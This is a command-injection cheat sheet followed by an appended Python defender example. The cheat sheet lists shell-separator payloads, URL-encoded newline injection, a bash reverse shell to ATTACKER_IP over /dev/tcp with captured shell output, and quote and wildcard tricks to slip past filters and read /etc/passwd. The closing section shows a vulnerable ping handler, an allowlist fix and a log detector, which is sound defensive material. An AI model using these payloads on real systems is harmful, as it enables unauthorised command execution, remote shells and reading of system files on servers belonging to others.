COMMAND INJECTION

Basic command injection

Try all separators in every input — ping fields, search boxes, etc.

127.0.0.1; whoami
127.0.0.1 | whoami
127.0.0.1 && whoami
127.0.0.1 || whoami
`whoami`
$(whoami)

Example Output
Input: 127.0.0.1; whoami

PING 127.0.0.1: 64 bytes from 127.0.0.1
www-data
(Command injection CONFIRMED)

Newline injection

URL encoded newline — Bypass some filters

127.0.0.1%0awhoami

Example Output
Input: 127.0.0.1%0awhoami

PING 127.0.0.1: 64 bytes...
www-data
(%0a = newline, starts new command)

Reverse shell from injection

Get a shell — URL encode special chars

127.0.0.1; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1'

Example Output
Input: ;bash -c 'bash -i >& /dev/tcp/10.10.14.2/443 0>&1'

Attacker nc -nlvp 443:
connect to [10.10.14.2] from [10.10.10.5]
bash-4.4$ whoami
www-data

Bypass filters

Quote insertion, wildcards — When basic commands are blocked

w'h'oami
wh$@oami
/bin/w?oami
cat /et?/pas?wd

Example Output
whoami blocked? Try:
w'h'oami -> www-data
/bin/w?oami -> www-data
who$@ami -> www-data
cat /etc/passwd blocked? Try:
cat /et?/pas?wd -> works
tac /etc/passwd -> works (reverse cat)
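Added defender-side example, not part of this cheat sheet: a Python sketch of the vulnerable ping-handler pattern that the separators in "Basic command injection" exploit, a substring blocklist of the kind "Bypass filters" shows failing, the allowlist-plus-argv hardened form that rejects every payload on this page, and a detector run over constructed access-log lines. The function names, blocklist and log lines are constructed assumptions.

```python
import ipaddress
import re
import urllib.parse

# Constructed weak filter of the kind the "Bypass filters" section defeats: it
# matches command names as substrings, so w'h'oami or wh$@oami slip past it.
BLOCKED_WORDS = ("whoami", "cat /etc/passwd")

def blocklist_filter_allows(user_input: str) -> bool:
    """True when the blocklist would let the (URL-decoded) input through."""
    decoded = urllib.parse.unquote(user_input)   # %0a becomes a real newline
    return not any(word in decoded for word in BLOCKED_WORDS)

def vulnerable_ping_command(host: str) -> str:
    """The vulnerable pattern: user input pasted into a shell string. Returned,
    not executed; run via a shell, every separator starts a new command."""
    return f"ping -c 1 {host}"

HOSTNAME_RE = re.compile(
    r"(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?", re.IGNORECASE)

def validate_host(host: str) -> bool:
    """Allowlist instead of blocklist: a literal IP address or an RFC 1123
    hostname. Every payload on this page carries ; | & ` $ ( ) ' ? or a
    newline and is rejected before any command is built."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return HOSTNAME_RE.fullmatch(host) is not None

def safe_ping_argv(host: str) -> list:
    """Hardened form: validate, then build an argv list for subprocess.run()
    with its default shell=False, so the value is one argument to ping."""
    if not validate_host(host):
        raise ValueError("rejected host argument")
    return ["ping", "-c", "1", host]

# Detection side: flag parameter values holding shell metacharacters after URL
# decoding (separators, substitution, and the quote/wildcard filter bypasses).
META_RE = re.compile(r"[;&|`$()\n'\"?*]")

def flag_suspicious_param(raw_value: str) -> bool:
    return META_RE.search(urllib.parse.unquote(raw_value)) is not None

def suspicious_requests(log_lines):
    """Return the (constructed) log lines whose host= value looks injected."""
    return [line for line in log_lines
            if (m := re.search(r"[?&]host=([^ &]*)", line))
            and flag_suspicious_param(m.group(1))]
```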